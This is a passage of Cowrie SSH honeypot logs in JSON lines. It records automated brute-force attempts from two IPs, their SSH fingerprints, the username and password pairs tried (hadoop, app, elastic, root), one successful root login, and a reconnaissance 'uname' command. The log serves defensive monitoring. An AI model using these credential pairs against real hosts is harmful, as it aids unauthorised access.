umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-31T03:38:11.128614Z","src_ip":"212.227.125.160","session":"86d9fe1bb2da"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-31T03:38:12.001008Z","src_ip":"212.227.125.160","session":"86d9fe1bb2da"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:38:12.004140Z","src_ip":"212.227.125.160","session":"86d9fe1bb2da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57216,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b8e47b65bab","protocol":"ssh","message":"New connection: 212.227.125.160:57216 (1.2.3.4:22) [session: 0b8e47b65bab]","sensor":"my-vps","timestamp":"2025-08-31T03:38:16.851888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:38:17.350677Z","src_ip":"212.227.125.160","session":"0b8e47b65bab"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:38:17.351594Z","src_ip":"212.227.125.160","session":"0b8e47b65bab"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"12345678","message":"login attempt [hadoop/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T03:38:19.825885Z","src_ip":"212.227.125.160","session":"0b8e47b65bab"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:38:21.395555Z","src_ip":"212.227.125.160","session":"0b8e47b65bab"}
{"eventid":"cowrie.session.closed","duration":"28.1","message":"Connection lost after 28.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:38:26.205248Z","src_ip":"212.227.125.160","session":"bd2762fc3e88"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123456","message":"login attempt [app/app123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:38:26.211484Z","src_ip":"212.227.235.229","session":"1173b0ceeeb9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49138,"dst_ip":"1.2.3.4","dst_port":22,"session":"feb935126179","protocol":"ssh","message":"New connection: 212.227.125.160:49138 (1.2.3.4:22) [session: feb935126179]","sensor":"my-vps","timestamp":"2025-08-31T03:38:29.679276Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:38:29.680430Z","src_ip":"212.227.125.160","session":"feb935126179"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:38:29.927234Z","src_ip":"212.227.125.160","session":"feb935126179"}
{"eventid":"cowrie.login.failed","username":"app","password":"123456@123","message":"login attempt [app/123456@123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:38:30.957732Z","src_ip":"212.227.125.160","session":"feb935126179"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:38:32.206755Z","src_ip":"212.227.125.160","session":"feb935126179"}
{"eventid":"cowrie.session.closed","duration":"68.4","message":"Connection lost after 68.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:38:36.599218Z","src_ip":"212.227.235.229","session":"1173b0ceeeb9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56824,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c7689025c1e","protocol":"ssh","message":"New connection: 212.227.235.229:56824 (1.2.3.4:22) [session: 1c7689025c1e]","sensor":"my-vps","timestamp":"2025-08-31T03:38:42.705462Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:38:46.402536Z","src_ip":"212.227.235.229","session":"1c7689025c1e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:38:46.403707Z","src_ip":"212.227.235.229","session":"1c7689025c1e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47016,"dst_ip":"1.2.3.4","dst_port":22,"session":"720f6b3c682b","protocol":"ssh","message":"New connection: 212.227.235.229:47016 (1.2.3.4:22) [session: 720f6b3c682b]","sensor":"my-vps","timestamp":"2025-08-31T03:38:54.952693Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:38:55.669742Z","src_ip":"212.227.235.229","session":"720f6b3c682b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:38:55.670449Z","src_ip":"212.227.235.229","session":"720f6b3c682b"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456789","message":"login attempt [hadoop/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T03:39:01.572236Z","src_ip":"212.227.235.229","session":"720f6b3c682b"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:39:03.359156Z","src_ip":"212.227.235.229","session":"720f6b3c682b"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic123","message":"login attempt [elastic/elastic123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:39:09.948736Z","src_ip":"212.227.235.229","session":"1c7689025c1e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54090,"dst_ip":"1.2.3.4","dst_port":22,"session":"6353e5b05fd9","protocol":"ssh","message":"New connection: 212.227.125.160:54090 (1.2.3.4:22) [session: 6353e5b05fd9]","sensor":"my-vps","timestamp":"2025-08-31T03:39:13.819431Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36866,"dst_ip":"1.2.3.4","dst_port":22,"session":"83a46b1c8969","protocol":"ssh","message":"New connection: 212.227.125.160:36866 (1.2.3.4:22) [session: 83a46b1c8969]","sensor":"my-vps","timestamp":"2025-08-31T03:39:15.865191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:39:16.508743Z","src_ip":"212.227.125.160","session":"83a46b1c8969"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:39:16.509467Z","src_ip":"212.227.125.160","session":"83a46b1c8969"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456789","message":"login attempt [hadoop/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T03:39:18.757680Z","src_ip":"212.227.125.160","session":"83a46b1c8969"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:39:20.098067Z","src_ip":"212.227.125.160","session":"83a46b1c8969"}
{"eventid":"cowrie.session.closed","duration":"38.4","message":"Connection lost after 38.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:39:21.080038Z","src_ip":"212.227.235.229","session":"1c7689025c1e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:39:23.711808Z","src_ip":"212.227.125.160","session":"6353e5b05fd9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:39:23.714132Z","src_ip":"212.227.125.160","session":"6353e5b05fd9"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssw0rd","message":"login attempt [root/p@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:39:39.897273Z","src_ip":"212.227.125.160","session":"6353e5b05fd9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53414,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba71d37c2b06","protocol":"ssh","message":"New connection: 212.227.235.229:53414 (1.2.3.4:22) [session: ba71d37c2b06]","sensor":"my-vps","timestamp":"2025-08-31T03:39:43.239181Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:39:45.780469Z","src_ip":"212.227.125.160","session":"6353e5b05fd9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:39:45.781167Z","src_ip":"212.227.125.160","session":"6353e5b05fd9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:39:46.706496Z","src_ip":"212.227.235.229","session":"ba71d37c2b06"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:39:46.707315Z","src_ip":"212.227.235.229","session":"ba71d37c2b06"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"6.5","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:39:52.306699Z","src_ip":"212.227.125.160","session":"6353e5b05fd9"}
{"eventid":"cowrie.session.closed","duration":"38.5","message":"Connection lost after 38.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:39:52.335284Z","src_ip":"212.227.125.160","session":"6353e5b05fd9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54626,"dst_ip":"1.2.3.4","dst_port":22,"session":"41ed78f8db34","protocol":"ssh","message":"New connection: 212.227.235.229:54626 (1.2.3.4:22) [session: 41ed78f8db34]","sensor":"my-vps","timestamp":"2025-08-31T03:39:54.375736Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:39:55.151438Z","src_ip":"212.227.235.229","session":"41ed78f8db34"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:39:55.152573Z","src_ip":"212.227.235.229","session":"41ed78f8db34"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44856,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d7b53f2fefa","protocol":"ssh","message":"New connection: 212.227.125.160:44856 (1.2.3.4:22) [session: 1d7b53f2fefa]","sensor":"my-vps","timestamp":"2025-08-31T03:39:57.824161Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:39:57.824977Z","src_ip":"212.227.125.160","session":"1d7b53f2fefa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:39:58.069592Z","src_ip":"212.227.125.160","session":"1d7b53f2fefa"}
{"eventid":"cowrie.login.failed","username":"infocare","password":"!QAZxsw2","message":"login attempt [infocare/!QAZxsw2] failed","sensor":"my-vps","timestamp":"2025-08-31T03:39:59.101305Z","src_ip":"212.227.125.160","session":"1d7b53f2fefa"}
